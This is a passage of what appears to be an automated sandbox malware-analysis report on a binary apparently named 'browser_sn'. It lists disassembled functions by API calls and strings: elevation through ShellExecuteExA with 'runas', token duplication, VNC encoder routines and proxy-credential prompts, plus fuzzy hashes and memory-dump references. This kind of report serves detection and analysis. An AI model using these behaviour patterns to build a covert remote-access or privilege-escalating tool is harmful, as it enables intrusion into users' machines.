Instruction Fuzzy Hash: 3801A536628B8185E770AB30F49439AB3B4FB89748F801235D6CD02B58DF7DE158CB50

Function 00007FF790C39A70 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF790C39A99
GetForegroundWindow.USER32 ref: 00007FF790C39AA8
ShellExecuteExA.SHELL32 ref: 00007FF790C39AF7

Strings

-install, xrefs: 00007FF790C39ADA
runas, xrefs: 00007FF790C39AB3
p, xrefs: 00007FF790C39A9F

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellWindow
String ID: -install$p$runas
API String ID: 3648085421-1683557327
Opcode ID: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
Instruction ID: a2240b288396d32f417b50e91fca8c4fe23de7d258f7c803bbe47b8bb041b1f2
Opcode Fuzzy Hash: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
Instruction Fuzzy Hash: 7D01A536628B8185E770AB30F49439AB3B4FB89748F801235D6CD02B58DF7DE158CB50

Function 00007FF790C39BD0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF790C39BF9
GetForegroundWindow.USER32 ref: 00007FF790C39C08
ShellExecuteExA.SHELL32 ref: 00007FF790C39C57

Strings

runas, xrefs: 00007FF790C39C13
-securityeditor, xrefs: 00007FF790C39C3A
p, xrefs: 00007FF790C39BFF

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellWindow
String ID: -securityeditor$p$runas
API String ID: 3648085421-1380712588
Opcode ID: 6428cee7919a180ae7089cf50127ee33227a6254b4296794cfa51c588de506a2
Instruction ID: 0624555701ed9f05b59f1c7d2f72fac8302601a3c3c08333f869ee837377ec1e
Opcode Fuzzy Hash: 6428cee7919a180ae7089cf50127ee33227a6254b4296794cfa51c588de506a2
Instruction Fuzzy Hash: C601A536629B8185E770AB30F49439AB3B4FB89758F801235D6CD02B58DF7DE158CB50

Function 00007FF790C39B20 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF790C39B49
GetForegroundWindow.USER32 ref: 00007FF790C39B58
ShellExecuteExA.SHELL32 ref: 00007FF790C39BA7

Strings

-uninstall, xrefs: 00007FF790C39B8A
runas, xrefs: 00007FF790C39B63
p, xrefs: 00007FF790C39B4F

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellWindow
String ID: -uninstall$p$runas
API String ID: 3648085421-3602422011
Opcode ID: 5574e6ddee382544abc3d2c84dae34c608b18e4d42992b9071503c0150b71b53
Instruction ID: 1c1f65693f8489f106700d479f61305714892c5874e2f2159a8085dff2b7c6d7
Opcode Fuzzy Hash: 5574e6ddee382544abc3d2c84dae34c608b18e4d42992b9071503c0150b71b53
Instruction Fuzzy Hash: 7801A536628B8185E770AB30F49439AB3B4FB89748F801235D6CD02B58DF7DE158CB50

Function 00007FF790C6BA00 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 117COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF790C6BA9C
malloc.LIBCMT ref: 00007FF790C6BAAC

Strings

vncencoder.cpp : failed to obtain colour map data!, xrefs: 00007FF790C6BB95
vncencoder.cpp : generating 8-bit palette data, xrefs: 00007FF790C6BB3B
vncencoder.cpp : remote palette data requested, xrefs: 00007FF790C6BA21
vncencoder.cpp : generating BGR233 palette data, xrefs: 00007FF790C6BA79

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: freemalloc
String ID: vncencoder.cpp : failed to obtain colour map data!$vncencoder.cpp : generating 8-bit palette data$vncencoder.cpp : generating BGR233 palette data$vncencoder.cpp : remote palette data requested
API String ID: 3061335427-2748099863
Opcode ID: 63f80d4832f6e4566eecb43401796b936a332ff03a4846ba86bc6f35182ff0bb
Instruction ID: 26fff8eddb9410d823d6036913bbbc0fb2d331f7ea71086215853f293b14edeb
Opcode Fuzzy Hash: 63f80d4832f6e4566eecb43401796b936a332ff03a4846ba86bc6f35182ff0bb
Instruction Fuzzy Hash: 3641E5A2A38A9342F734AB30A5013B9B761EF46744F841032EA4D47B9ADF3CF545D760

Function 00007FF790C3C6A0 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 105COMMON

Download Yara Rule

Strings

Proxy-Authorization: Basic %s, xrefs: 00007FF790C3C78C
%s:%s, xrefs: 00007FF790C3C740
Enter proxy authentication password for %s@%s: , xrefs: 00007FF790C3C6E0

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID:
String ID: %s:%s$Enter proxy authentication password for %s@%s: $Proxy-Authorization: Basic %s
API String ID: 0-3750121419
Opcode ID: dcac41199ae3c8df7bcab697df2315285d75f018ff24bfe801cf74db9f7aaf51
Instruction ID: 4969350a527dfc0f871f373e8bb5dbad73eb50c2963a795e1e14ce011188b0de
Opcode Fuzzy Hash: dcac41199ae3c8df7bcab697df2315285d75f018ff24bfe801cf74db9f7aaf51
Instruction Fuzzy Hash: 52310422B2468144EB24EB76A8512E9A390EF4ABF4F941331EE3D47BD5DE3CE481C710

Function 00007FF790C442A0 Relevance: 9.1, APIs: 6, Instructions: 101threadwindowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32 ref: 00007FF790C4437C

Part of subcall function 00007FF790C43EF0: GetModuleFileNameA.KERNEL32 ref: 00007FF790C43F18
Part of subcall function 00007FF790C43EF0: PlaySoundA.WINMM ref: 00007FF790C43F85

CreateThread.KERNEL32 ref: 00007FF790C44336
ResumeThread.KERNEL32 ref: 00007FF790C4434C

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Thread$CreateFileMessageModuleNamePlayPostResumeSound
String ID:
API String ID: 3945334538-0
Opcode ID: 6ea77f1f998ec3782ac377f9155b0b4839ff24fcf66b865c59a37faa4ce68111
Instruction ID: f55fb269fe4dce0d6a5a245952c362a568ec9087c72c041fc839698a223fb084
Opcode Fuzzy Hash: 6ea77f1f998ec3782ac377f9155b0b4839ff24fcf66b865c59a37faa4ce68111
Instruction Fuzzy Hash: 9841D326B2894191EB20AF35E4402BDA3A2FFC9BA8F945131DF5D03799DE3CE481C760

Function 00007FF790CEAA6C Relevance: 9.1, APIs: 6, Instructions: 92COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF790CEAA99
_invalid_parameter_noinfo.LIBCMT ref: 00007FF790CEAAA4
_fileno.LIBCMT ref: 00007FF790CEAAD5
_errno.LIBCMT ref: 00007FF790CEAB45
_invalid_parameter_noinfo.LIBCMT ref: 00007FF790CEAB50
_ftbuf.LIBCMT ref: 00007FF790CEAB80

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo$_fileno_ftbuf
String ID:
API String ID: 2434734397-0
Opcode ID: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
Instruction ID: a77cecbaf573b9cc64957e973e02a206015c6851ea3cc26ff8f4b028f7894d9b
Opcode Fuzzy Hash: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
Instruction Fuzzy Hash: 12315861A286024AEE74B77959912F9A2926F42BE0FD05231DD1E873D1DF2CFC41E220

Function 00007FF790CC7C90 Relevance: 9.1, APIs: 6, Instructions: 64synchronizationCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF790CC7CA9
LeaveCriticalSection.KERNEL32 ref: 00007FF790CC7CC3

Part of subcall function 00007FF790CF2950: RaiseException.KERNEL32 ref: 00007FF790CF29CB

LeaveCriticalSection.KERNEL32 ref: 00007FF790CC7CE7
TlsGetValue.KERNEL32 ref: 00007FF790CC7CF3
WaitForSingleObject.KERNEL32 ref: 00007FF790CC7D3B
GetLastError.KERNEL32 ref: 00007FF790CC7D45

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterErrorExceptionLastObjectRaiseSingleValueWait
String ID:
API String ID: 824239979-0
Opcode ID: 12bf6ecd7088038fd47cecf56f3922a6986b1dec9d24cf819874f6182f192e8f
Instruction ID: aa117773dd65fd6fbca0cad0596e1766aa5fef6c5dfbdf83af372d37f34fc271
Opcode Fuzzy Hash: 12bf6ecd7088038fd47cecf56f3922a6986b1dec9d24cf819874f6182f192e8f
Instruction Fuzzy Hash: 62217122A38A4282EB61AF34D4451B9B3B0FF85784FC46531EA5E43759DF2CF445C720

Function 00007FF790C41C10 Relevance: 9.1, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00007FF790C41C72
OpenProcessToken.ADVAPI32 ref: 00007FF790C41C92
DuplicateTokenEx.ADVAPI32 ref: 00007FF790C41CB8
SetTokenInformation.ADVAPI32 ref: 00007FF790C41CD2
CloseHandle.KERNEL32 ref: 00007FF790C41CDD
CloseHandle.KERNEL32 ref: 00007FF790C41CE6

Part of subcall function 00007FF790C419A0: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF790C419C6
Part of subcall function 00007FF790C419A0: Process32First.KERNEL32 ref: 00007FF790C419E5
Part of subcall function 00007FF790C419A0: CloseHandle.KERNEL32 ref: 00007FF790C419F2

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CloseHandleToken$OpenProcess$CreateDuplicateFirstInformationProcess32SnapshotToolhelp32
String ID:
API String ID: 3355884492-0
Opcode ID: 6104325d5a1b9d43be635a96be43e70745f11669b1d82cc91958b0e9663c2412
Instruction ID: 7c0b5341ec47493b84dc29f766bcf06ae407ffaf53e22758610940228dabf8a4
Opcode Fuzzy Hash: 6104325d5a1b9d43be635a96be43e70745f11669b1d82cc91958b0e9663c2412
Instruction Fuzzy Hash: 55215936B2C68282EB20AB35A844269E7B1BF89790F844135EA9D43B95DE7CE4458B11

Function 00007FF790CE99D8 Relevance: 9.0, APIs: 6, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF790CE99ED
_invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE99F8
_flush.LIBCMT ref: 00007FF790CE9A07
_freebuf.LIBCMT ref: 00007FF790CE9A11
_fileno.LIBCMT ref: 00007FF790CE9A19

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _errno_fileno_flush_freebuf_invalid_parameter_noinfo
String ID:
API String ID: 3613856401-0
Opcode ID: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
Instruction ID: 58d45004ba770e707c5d7d3a9009b30feb90eb4a440beb45f339ffc062295a4a
Opcode Fuzzy Hash: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
Instruction Fuzzy Hash: FD014F12E2868241FB74BA7598523FD91909F967A4FA90230EA2D463C3CE7CFC41B360

Function 00007FF790C40310 Relevance: 9.0, APIs: 6, Instructions: 30COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 00007FF790C4032D
free.LIBCMT ref: 00007FF790C40337

Part of subcall function 00007FF790CE8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C0A
Part of subcall function 00007FF790CE8BF4: _errno.LIBCMT ref: 00007FF790CE8C14
Part of subcall function 00007FF790CE8BF4: GetLastError.KERNEL32(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C1C

DeleteObject.GDI32 ref: 00007FF790C40340
free.LIBCMT ref: 00007FF790C4034A
DeleteObject.GDI32 ref: 00007FF790C40353
free.LIBCMT ref: 00007FF790C4035D

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
String ID:
API String ID: 2426525106-0
Opcode ID: 603f918af7fb599e57d4a8c5aa72689e5f4edbcd5d23c5f13df1708e76f5f105
Instruction ID: b223f92d4c721b592039c4229e8a7915fe3b2552e76f3158a82211d12bfc574b
Opcode Fuzzy Hash: 603f918af7fb599e57d4a8c5aa72689e5f4edbcd5d23c5f13df1708e76f5f105
Instruction Fuzzy Hash: B0011262A68A41A7DA64FB36EA510B8B374FF89B80BC05031DA4D47771CF38F8A5C314

Function 00007FF790C4DEB0 Relevance: 9.0, APIs: 6, Instructions: 30COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 00007FF790C4DECD
free.LIBCMT ref: 00007FF790C4DED7

Part of subcall function 00007FF790CE8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C0A
Part of subcall function 00007FF790CE8BF4: _errno.LIBCMT ref: 00007FF790CE8C14
Part of subcall function 00007FF790CE8BF4: GetLastError.KERNEL32(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C1C

DeleteObject.GDI32 ref: 00007FF790C4DEE0
free.LIBCMT ref: 00007FF790C4DEEA
DeleteObject.GDI32 ref: 00007FF790C4DEF3
free.LIBCMT ref: 00007FF790C4DEFD

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
String ID:
API String ID: 2426525106-0
Opcode ID: 19dd2d2afd55e3adf8fb9d01f5eac84cc95537aa2f4af578a0b97840d6351f68
Instruction ID: fd23b46a037a11da72da1909562e401cf52496b7d6a8a68c73a917416bb329e2
Opcode Fuzzy Hash: 19dd2d2afd55e3adf8fb9d01f5eac84cc95537aa2f4af578a0b97840d6351f68
Instruction Fuzzy Hash: 54011772624A4192D664FB36EA510B8B374FF89B80BC05031DA4D47761CF38F8B5C314

Function 00007FF790C40390 Relevance: 9.0, APIs: 6, Instructions: 22COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 00007FF790C403A7
free.LIBCMT ref: 00007FF790C403B1

Part of subcall function 00007FF790CE8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C0A
Part of subcall function 00007FF790CE8BF4: _errno.LIBCMT ref: 00007FF790CE8C14
Part of subcall function 00007FF790CE8BF4: GetLastError.KERNEL32(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C1C

DeleteObject.GDI32 ref: 00007FF790C403BA
free.LIBCMT ref: 00007FF790C403C4
DeleteObject.GDI32 ref: 00007FF790C403CD
free.LIBCMT ref: 00007FF790C403D7

Memory Dump Source

